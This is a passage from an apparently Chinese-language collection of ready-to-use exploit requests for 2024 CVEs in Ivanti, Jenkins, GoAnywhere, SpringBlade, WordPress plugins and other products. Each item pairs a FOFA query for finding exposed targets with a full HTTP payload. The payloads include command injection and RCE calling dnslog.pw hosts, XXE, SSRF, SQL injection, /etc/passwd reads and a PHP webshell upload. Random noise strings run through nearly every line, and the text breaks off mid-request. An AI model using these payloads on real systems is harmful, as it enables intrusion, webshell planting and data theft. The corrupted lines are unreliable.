9 D- ?1 s6 E3 vContent-Length: 121
# Z! W# ~% d9 @' }" z7 pAccept: */* A# L l# Q, U) I
Accept-Encoding: gzip, deflate# W& P5 J3 X7 Z# h& \' q3 A; F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, |5 H2 M% R, u5 V& z9 {Content-Type: application/x-www-form-urlencoded; charset=UTF-8
& ~$ O/ Y6 R3 ~% s* l9 XX-Requested-With: XMLHttpRequest% ^9 ?6 B& f8 D& c, j E; j7 m
7 Z( j1 v! f: c3 C0 f
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
5 H2 v7 y' T9 A; h& w! U
0 h( f c4 Y- J. T: @6 p5 ?/ D
3 D. y z8 d& |5 {5 s' C7 V99. Ncast盈可视高清智能录播系统busiFacade RCE
2 g: ]0 e# `; f2 _2 B0 D. `CVE-2024-03051 Q; }1 {) t4 A# S# D
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
% x$ v, q+ Z8 L$ _: e" E5 n2 h, LPOST /classes/common/busiFacade.php HTTP/1.1
: j6 p5 v7 h6 D0 a2 x8 N1 q4 ]+ gHost: 192.168.40.130:8080
5 a1 G: v# l( Y7 P- xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 L; k9 ^, l+ P+ ~4 X9 ZConnection: close' h% x% f" C/ m- d1 m0 l
Content-Length: 154
1 J. F1 j6 L, q& x% N( [Accept: */*
3 H: V$ r+ v- A- e1 B! [$ V# O ~- tAccept-Encoding: gzip, deflate
& i$ [+ |+ c; V+ R' P. fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( ~- K' ^% J1 K* E9 f, m% ?+ i
Content-Type: application/x-www-form-urlencoded; charset=UTF-8/ t, T6 }$ j2 g- u
X-Requested-With: XMLHttpRequest
) b( q, \7 h3 o/ P/ C& N- ~5 a/ v. ~8 J+ f: w* j
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D4 Q) }2 `& m# n$ u' I& k- l
) `. x4 R% p5 N' v+ j# i- ?0 }: T$ d8 Y3 s+ X4 V& N
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
0 E% E e% v- p1 D+ T. MCVE-2024-0352
7 j) M* @. D' }: M4 P+ cFOFA:icon_hash="874152924"
2 r$ f2 o1 t7 i: j+ ^6 ^3 BPOST /api/file/formimage HTTP/1.1
0 a A7 X7 N8 ~Host: 192.168.40.130/ M+ p- ?* s2 v7 m/ ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36' g1 h( Y1 D$ \' |$ a K9 P' H
Connection: close+ ]" t1 J1 b) K# _ j. p5 U& Z/ u
Content-Length: 201
# J0 F9 a$ w6 b2 pContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei7 C1 B% Z. Q: v4 R# g3 o9 ?5 O
Accept-Encoding: gzip4 n" F) ~* {# o
% ]; H; O7 _1 Q4 G0 S a! E: ?------WebKitFormBoundarygcflwtei6 f2 F0 P/ Y7 f4 _
Content-Disposition: form-data; name="file";filename="IE4MGP.php"1 Q& X, f( ]8 ]* Z% H
Content-Type: application/x-php
: {! X& w9 C8 o# _7 e
" Z( b! D. |7 m7 E6 C6 U( W4 a. \2ayyhRXiAsKXL8olvF5s4qqyI2O. I9 \$ r% p/ d8 E3 j+ [
------WebKitFormBoundarygcflwtei--
* f2 q! }0 F0 L
7 `8 ]2 d; C ^" S0 O, v% h& u8 d( h4 e: H9 E
101. ivanti policy secure-22.6命令注入
0 Q* j, a4 A4 l; lCVE-2024-218879 M8 t. N- Y# O# f; @5 c
FOFA:body="welcome.cgi?p=logo"3 d2 k0 w- W7 ~5 G. C& V
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
8 C8 R7 i8 n7 D. v( eHost: x.x.x.xx.x.x.x+ z( |6 i% D% E4 \$ t1 b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! I: m6 o. k* ^& \# N
Connection: close
0 Y P" ]' _9 f8 @, q; @4 L$ r; v, @5 IAccept-Encoding: gzip+ F2 W& C) O3 u: s1 p* R% g) W
& ^% h; K+ g7 g- l/ E9 j. P6 F: {3 f
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行" C% R9 ^" F& L
CVE-2024-21893' ]4 w) z- \0 B4 a4 E3 `) W
FOFA:body="welcome.cgi?p=logo"
6 C3 _; w! _4 x0 W& s# YPOST /dana-ws/saml20.ws HTTP/1.1/ D4 \- ]2 _# D% b& } ~
Host: x.x.x.x9 ~0 h! l# I, K" a* e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36- {% t, s6 u1 ~
Connection: close
6 J5 L+ l. F# f3 f, `Content-Length: 792
2 X% p n! ^% {* M% m0 @/ m; |% S# }Accept-Encoding: gzip
1 {) {7 m0 v) R* o' J. z. d3 x+ k' w% _, W+ d7 h! l
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
: i6 C/ G, U3 Z3 S) X: l
k; h1 w) q2 t( `: ]103. Ivanti Pulse Connect Secure VPN XXE
+ x# }( g9 q% PCVE-2024-22024
3 z( z7 q8 C! r" U8 ^FOFA:body="welcome.cgi?p=logo"
) }! M/ }* A0 A' ?3 IPOST /dana-na/auth/saml-sso.cgi HTTP/1.14 @$ j( Z( M. a
Host: 192.168.40.130:1112 t: V! w" Q( H1 S7 s- Q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36! \" e( Y5 I; g- [7 v) s c
Connection: close# J% N* I/ @2 C6 O
Content-Length: 204, |9 w1 E" H( j$ I5 Y6 O7 B
Content-Type: application/x-www-form-urlencoded
9 w- |! C4 |1 ?# c. }Accept-Encoding: gzip
( _5 T2 e# P7 u
# z5 ^+ c9 r0 G; NSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==. c: ^5 e4 A- H) K1 d
$ @$ S* n0 t! a" H" _5 a& g* k
6 {: t4 Y$ H) M% y- C/ O
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
% A/ S) L; A8 ~: o3 q" C<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
! M3 l2 k8 G: X S. y+ m- f; ]6 C* |
# w, E. p( Z. v$ t$ m' C8 z0 }9 p' V, {8 y. M+ F2 f
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: O+ t% C5 q" H. Y4 ~2 ?CVE-2024-0569
0 j8 u6 S) l% o: o5 ~6 Y; `FOFA:title="TOTOLINK" U6 H9 V7 x7 {- [: `0 E$ d) _
POST /cgi-bin/cstecgi.cgi HTTP/1.1
- \' _; `2 T" O4 g+ K1 T& P5 h/ nHost:192.168.0.1
# d( w/ C4 d" W( G' Z3 M6 qContent-Length:41
6 t. _1 i* N* U9 \4 c* PAccept:application/json,text/javascript,*/*;q=0.01/ y7 T9 M. }- U5 O1 p+ W
X-Requested-with: XMLHttpRequest
' }! [8 G7 i4 W ?' N4 aUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
+ ?0 v6 T3 y2 v; e+ jContent-Type: application/x-www-form-urlencoded:charset=UTF-8
) s: a' W# g4 P0 `Origin: http://192.168.0.1
% C- B! r4 }) j( Z5 k- ?" B9 q. SReferer: http://192.168.0.1/advance/index.html?time=1671152380564) q0 S9 a. o6 F: t- W; r& r
Accept-Encoding:gzip,deflate' e) o) ~. [' d
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7+ r+ C4 M5 R$ ?- F4 Q8 k7 w3 L
Connection:close
/ ]4 E7 F9 E" a4 E- k4 a
F# H5 t% D5 Y7 A0 _{
. u7 l' p7 r# f( T"topicurl":"getSysStatusCfg",6 D# o5 s% }) _7 \2 u+ } f
"token":""
9 H- X* }7 Y# p7 N5 V/ z! T}
# B" K, ] ^* H3 U
% S/ \5 J6 L% |1 o- D$ ?105. SpringBlade v3.2.0 export-user SQL 注入7 V5 [% f. D3 `. j" v- g, w- z
FOFA:body="https://bladex.vip"
. `* c- o# X8 Y/ {http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
' X5 p# h- A, O$ F/ K
7 [( e3 }6 C% ]8 r106. SpringBlade dict-biz/list SQL 注入) i- b0 `* x# n
FOFA:body="Saber 将不能正常工作"
( n! Q1 r0 Y+ M4 j, l; w) d! ^( q7 {GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.11 {" T/ I6 D. [8 }9 S5 b
Host: your-ip
! ~$ |3 H5 R- w- S, `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
M8 C$ X a" mBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
6 T5 O# Z9 @7 r, kAccept-Encoding: gzip, deflate
+ u$ d R) R' j% P1 gAccept-Language: zh-CN,zh;q=0.97 I/ c2 i% ^ H4 ^, g7 r2 G8 J
Connection: close
. y( g& E6 G* Y2 L5 D+ e7 `- j0 P4 C* \( ~3 m' V8 I* }
; N! n* P6 n- `8 U2 c8 I: z6 x9 l107. SpringBlade tenant/list SQL 注入
0 t. ?4 M2 { p! f7 f' ?9 RFOFA:body="https://bladex.vip", H' R+ k; u" ` h v6 S5 w
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1# W& v+ X/ g% S, N# r8 I
Host: your-ip
5 `/ v5 E/ ]: r3 Z5 S" \4 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' [: ^$ a6 z, Y/ R+ l! d4 FBlade-Auth:替换为自己的& i# f+ e" p9 L- m# n8 p- ?
Connection: close2 I3 W" }* V$ o
5 @* k, w# P6 y( m% Q
5 c1 Z1 ~5 r& _" ?! j: ^$ C108. D-Tale 3.9.0 SSRF
$ _" ` g4 P' r2 A$ CCVE-2024-216429 G1 A2 r7 J6 N( I. c% L
FOFA:"dtale/static/images/favicon.png") `9 O1 m7 Y$ f; P! F
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
/ D3 E8 o3 S3 }% d9 |Host: your-ip
1 ?) h! J/ V2 M3 r+ x& S& ]Accept: application/json, text/plain, */*/ A# a1 K r% F5 E/ H( I" }, p6 L: m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 U, M& f) \( C9 z9 ]# {8 s. cAccept-Encoding: gzip, deflate6 H4 V- b5 e. n. n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- Y0 H- C" K4 B" [/ y4 \: j" w% k$ Y. C
Connection: close
) s2 @2 R3 }9 X* ~0 J3 w# z+ ?, n+ O, }! Z% g+ b* U
/ k& q' B! P1 L1 Q5 m# i3 h
109. Jenkins CLI 任意文件读取
3 G7 w% v$ M' U8 u2 h0 z7 RCVE-2024-238975 w+ H, n& t& Q' s& ?
FOFA:header="X-Jenkins"
% s3 }- T9 D: Y6 }% g5 d. JPOST /cli?remoting=false HTTP/1.1 Z6 H! O! w! l( y
Host:
" o% @6 ~0 C4 s8 y; I3 p' BContent-type: application/octet-stream8 z9 f# _% O. R4 j+ K- n! W% g- M
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92& y+ [" P/ V" L3 {/ T. k) z
Side: upload. w+ x8 m/ ?0 ]+ a7 F4 ^ P; s, a
Connection: keep-alive. L1 K8 O3 z" N# [
Content-Length: 163
! ?6 A! Y7 U. @) F# r
, ]8 m! @6 Q1 `/ fb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
5 s- ^1 m* V/ w' h. k5 K7 e1 C, M/ g& z+ E# A; e8 r4 r
& ~' Y8 X1 N* Z, ]4 u8 O( g9 x. B
POST /cli?remoting=false HTTP/1.1; t) m: J; q' j4 [" \; a$ P
Host:4 ^, B& C5 `* d
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e926 q! V u4 s7 d9 p0 f
download+ v, p+ U1 R. |9 o! W7 u
Content-Type: application/x-www-form-urlencoded* j0 o8 K9 Z% n8 }
Content-Length: 0* H" a& {% r/ {+ e5 a, ?+ M; V
3 w, K) \* [; C5 h
8 \3 z/ q3 W! b3 O" N" W
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2 i e- ~" k- B/ J% cjava -jar jenkins-cli.jar help
7 i6 \$ `; j4 Z5 E[COMMAND]
6 e9 S, f: q0 A% ~1 i1 |Lists all the available commands or a detailed description of single command.
; a; i2 \# N- _6 g/ n, A COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
/ Z: n+ y. R6 c' Q' `* l. f; k/ m' g: e$ j
) h, y- v6 }$ S) V* M
110. Goanywhere MFT 未授权创建管理员' i7 \: S, M, v
CVE-2024-0204* D9 K- ^0 X1 a7 ^: Y7 x9 c
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"0 K9 F7 ]1 p2 H" t+ n" Z- c$ x
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
4 X3 ~3 x* ?7 K, E* @Host: 192.168.40.130:8000" U$ u) R4 O' ^6 J" W
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
1 y; L$ N+ H# R9 q& B! P5 G! L" m' }Connection: close
+ H" ^4 s0 @# f7 B9 OAccept: */*4 N- T2 ~" T( P6 X- b" U" W
Accept-Language: en, v3 J8 B6 h' Q0 \, b& N
Accept-Encoding: gzip
5 a2 e: b" F( {4 D( H( a. o0 I& X; l1 F
! g1 |- w: M. [: `7 A: j N" p# p
111. WordPress Plugin HTML5 Video Player SQL注入
: ~0 R- D' l9 l! tCVE-2024-1061
7 Q# ~' L6 I5 t3 T9 k& kFOFA:"wordpress" && body="html5-video-player"
4 F0 Q! |1 r# |* \* D6 p, T" EGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1* g7 r2 x8 }+ l; a5 I2 r4 P9 H
Host: 192.168.40.130:112
- w% |! z) I' [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* ]2 |7 P2 B6 S: ^
Connection: close
/ v& k% {, N) i: iAccept: */*. [. U0 v7 K, [- D5 C; m
Accept-Language: en: R; S$ E% O9 A0 b2 D& q8 S8 p
Accept-Encoding: gzip' B( [0 w1 h: T. [5 J
& I; Q- Z8 _5 m/ d) y9 N0 q
* d7 U4 d, m% r7 x6 h4 R112. WordPress Plugin NotificationX SQL 注入* F5 I8 l% |2 N
CVE-2024-1698* P3 R. }/ V2 b" Z
FOFA:body="/wp-content/plugins/notificationx"
7 v. ?/ `5 I; x5 R* C0 oPOST /wp-json/notificationx/v1/analytics HTTP/1.10 t1 ~( v$ L, r0 c- H
Host: {{Hostname}}: J* y: {5 m. }* }
Content-Type: application/json/ S1 ~+ k1 j9 \' I% i7 G% G0 s
9 E8 D: D# T. m5 x* D9 e- j, N V
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}. |2 B( [) x% d6 {
: Y4 O8 ~% f! ]" l' W# D' [/ Z* f% e8 R
113. WordPress Automatic 插件任意文件下载和SSRF8 K: Q$ c" V( g0 ^: V u0 [
CVE-2024-279543 }! }5 G4 S6 D% R8 G Z
FOFA:"/wp-content/plugins/wp-automatic"
8 V3 O- d3 `& l/ v W9 l- XGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1& R+ S$ `& H/ J4 \+ K- P1 R, T2 O# O
Host: x.x.x.x
" s- P9 Q- D$ s8 s8 ^User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ ?& m6 n5 I' \$ h. t; W8 NConnection: close
+ P1 }7 L" C0 @9 h' X9 QAccept: */*3 N0 u5 X1 G9 |0 q. u* r
Accept-Language: en
9 F& D1 P, l9 ?% {Accept-Encoding: gzip$ T. p% f' l* o- S& A: ?
; d! l- V) j' A# N* i% M: _; m% l# n* O& S
114. WordPress MasterStudy LMS插件 SQL注入! w* E* B. o9 s% ]- x( A) \" K/ q
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
7 q, d: q- S0 J' J; pGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
9 d, J( r* r' B0 p9 i- {. r8 }8 ZHost: your-ip
; T9 c# [1 M% E6 BUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' U" g, q! V5 xAccept-Charset: utf-8
: Z! j0 ]4 y: q, p8 A/ ]; NAccept-Encoding: gzip, deflate" R3 V% ? r' Z/ r V2 s
Connection: close
9 B" T3 u8 k- z8 k+ @& J9 Z9 G, v1 [4 W: L
# ~/ i5 w- Y: W0 l6 V) X
115. WordPress Bricks Builder <= 1.9.6 RCE
6 y" d, m6 O* XCVE-2024-25600
& w) i8 C7 ~, T& XFOFA: body="/wp-content/themes/bricks/"
/ b3 ], B# L8 Z$ S/ P2 [2 I( [# g第一步,获取网站的nonce值
! v" ?' Y1 _8 E. kGET / HTTP/1.1
) Z% N! ^: I6 x y/ ^+ ~3 }2 ZHost: x.x.x.x A1 \: I" d9 L
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36: Q$ a4 f X3 V& q: A
Connection: close
6 g, \9 ^' W0 \2 d2 wAccept-Encoding: gzip+ } O0 a3 n% u( y
1 s* |8 n" R% D4 g8 V9 _* @' n+ o8 E
; Q0 e, H2 w r$ _4 Q第二步替换nonce值,执行命令
2 o# { h! ]1 h$ j) q$ |POST /wp-json/bricks/v1/render_element HTTP/1.10 O! n8 f& Q* j; [5 g6 U. U* ~
Host: x.x.x.x
& F4 @& x% z& y+ @, N* FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 K9 g5 w1 r& R; B- E: r3 q$ Z
Connection: close% ^: S* [1 a7 i+ D# a
Content-Length: 356" o1 _. Y" \' W, ]' G2 q
Content-Type: application/json
. d' L; ?1 r- v1 {* c8 n( X8 zAccept-Encoding: gzip
t1 ~3 l5 F5 i7 [ V/ t8 K9 B6 w# N9 E
{
8 f, V# t3 U: C6 e; w"postId": "1",, o% D2 k) E! M! @! ]0 Q
"nonce": "第一步获得的值",
8 ~; i( h9 ]2 k! ]" A "element": {/ c" t* w" A" G# T! A8 w
"name": "container",1 n0 C1 r4 J- ^5 K
"settings": {
0 m$ o& |; K# b5 `3 Z "hasLoop": "true",
2 o. y9 U$ ~- {* ] "query": {- f0 s& U# {: g( M
"useQueryEditor": true,/ V8 J* B0 m) {
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
. }. j0 ~+ H9 F6 H8 ?9 I& U9 w J "objectType": "post"6 }: P7 ^$ ?; J- j3 ~% n. j3 {
}2 N1 S9 u( P( X& ^) o' J- z+ k/ R* L! O' u
}
( X% o+ x% `0 z( O& M. O }
* j+ g i' g7 R}
& c0 H5 x2 R6 ?/ h# K6 K/ F! s
7 i" l: e* v, A5 d4 t. a+ T4 P7 O2 g* B
116. wordpress js-support-ticket文件上传% X2 U& O6 Z7 g" i
FOFA:body="wp-content/plugins/js-support-ticket"- Y7 \$ p9 q: f4 r
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.17 {8 f5 ?( h5 h5 A2 {) Z6 U& l8 K
Host:
* Q, K- x x$ u/ aContent-Type: multipart/form-data; boundary=--------767099171
; r1 R2 M" o) N# j- u) sUser-Agent: Mozilla/5.0
* |" a; J% a( u. H. K2 c% V+ R% [
1 F' U0 d" L/ M% w/ r" o0 Y! k----------767099171
G- W- a, v! B/ GContent-Disposition: form-data; name="action", F. x- l# O/ j1 z3 Y
configuration_saveconfiguration+ x5 Z; Y% O1 ~7 V- V
----------7670991717 Z1 a9 |$ j, A% F! S/ s
Content-Disposition: form-data; name="form_request"
o: e/ ^0 D9 r( y! Ijssupportticket8 C0 S# Z( a3 ]4 ~: ~
----------767099171
8 `4 E S4 s$ i m7 FContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
6 _7 ?7 c D/ u" VContent-Type: image/png
5 u0 F' a5 u' I: B----------767099171--' J4 u ~" z: K$ [
; G# a' f7 c! S! h" ]
$ H6 B2 Q3 m- s
117. WordPress LayerSlider插件SQL注入( k7 }( `) I8 B7 y) r
version:7.9.11 – 7.10.0" E5 }: y; S' v3 N
FOFA:body="/wp-content/plugins/LayerSlider/"& V9 A2 L* h1 z U( B
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.18 {& T! `$ L0 E; H l5 t, R$ ~
Host: your-ip' W, N" q: D6 Z, }, m/ W3 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ F8 d% ~" `! n# o6 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ w; R( C* y+ t7 I& `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' Q/ c F. c# R8 |! N
Accept-Encoding: gzip, deflate, br" u( n2 A0 e8 @ B! s8 t* z1 d6 N
Connection: close
, j2 Y$ |6 Q5 C1 }# j: M/ ^Upgrade-Insecure-Requests: 1: x* S' C' z& R5 S
7 l4 P" s' c3 x' x+ X0 {
5 k: a! q3 L- G( l& a. f) N4 I# w118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
$ Y6 f) J9 m4 ^, x G7 PCVE-2024-09395 J4 M r4 E+ N
FOFA:title="Smart管理平台"
6 }$ x0 N( p5 e5 m* iPOST /Tool/uploadfile.php? HTTP/1.1" A7 j8 s4 |9 {1 c: h l; @
Host: 192.168.40.130:8443 O: @4 y1 N, U3 q" ~9 w
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8' }% \4 P3 g2 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
% L9 Y( i" a' k3 z9 H9 P: H: @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- p$ z c2 i1 h/ C7 F4 `5 @+ p, uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, p3 w8 j- B5 G6 B4 [% ^/ m
Accept-Encoding: gzip, deflate
) P: b3 }" }# G% m- s9 k; |Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887: l y3 Q% H* ?" o' Y$ u1 h
Content-Length: 405' S3 U+ q. c$ |* X
Origin: https://192.168.40.130:8443; f$ U( F/ `+ Z( e* ^" k
Referer: https://192.168.40.130:8443/Tool/uploadfile.php" S3 s- r' q7 L7 s. ~5 }
Upgrade-Insecure-Requests: 1 \2 h" N' Q* y; U4 x3 G* |
Sec-Fetch-Dest: document
5 @( f9 n" G$ N6 ~Sec-Fetch-Mode: navigate/ ~+ I7 a1 n! [; y+ M( L+ k0 t
Sec-Fetch-Site: same-origin
. @8 R r l8 r, LSec-Fetch-User: ?14 r) u* l- J4 G+ v- P" e1 K% a T8 V
Te: trailers
' n( h# w) |' h3 g) ~Connection: close
2 e F. \% d8 F# c8 M; L% O
1 [0 |/ F: G* ^! w-----------------------------13979701222747646634037182887
6 k1 m$ Y; d2 FContent-Disposition: form-data; name="file_upload"; filename="contents.php"
: x0 a" G3 k8 ^Content-Type: application/octet-stream: t. K _' W. ^
# A% f4 v& c1 `' ^# M( {( C8 C<?php4 k4 R& R5 _6 s/ |
system($_POST["passwd"]);( ~4 i5 b: k7 P- s1 i9 C
?>; u1 @) G8 m" h j
-----------------------------139797012227476466340371828879 k* s, @- I" l* E; M' g5 V4 _
Content-Disposition: form-data; name="txt_path"
+ W' U: G: j' X8 z1 u5 @+ p; ^. E
. a# d) X0 \0 c6 j" J/home/src.php
2 j3 Y4 x; I. t" j5 F* {. i% X, D, W4 M-----------------------------13979701222747646634037182887--
3 Z; a \6 a9 F$ b2 n# U" j( x% V, h7 v h8 C
, k9 e6 A# D( m; N. V% m7 w访问/home/src.php3 B# N# ~/ b; p9 H
& i" Q4 o# U1 F% G$ Z8 n
119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 O- h7 M# S3 u: r8 B# lCVE-2024-1254
% y9 v% f" w1 T4 t, \5 I* oFOFA:title="Smart管理平台"$ l+ ~- [' V; }8 d! T3 X. M0 b
先登录进入系统,默认账号密码为admin/admin( _% S; g7 d$ @) H3 B
POST /sysmanage/sysmanageajax.php HTTP/1.11
6 v% j5 O& T5 b p6 FHost: x.x.x.x
' v+ L6 e) O* U. ~* k$ ^Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee3 a$ G$ J* w; C* k& z* k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 f J% d# `+ f& \0 P* z5 G* O: F
Accept: */*
+ b- P8 P- I# Z Y- IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# ]) ] N0 v4 p/ ?% Z% ?) B6 }Accept-Encoding: gzip, deflate5 O6 M' n! D9 t9 Y3 ]# _. e- d0 o, s: |
Content-Type: application/x-www-form-urlencoded;7 F! r$ [$ ]4 U4 A1 }: E
Content-Length: 1092 B" i9 \4 M# F, `' K0 G, ], o- X$ K
Origin: https://58.18.133.60:8443
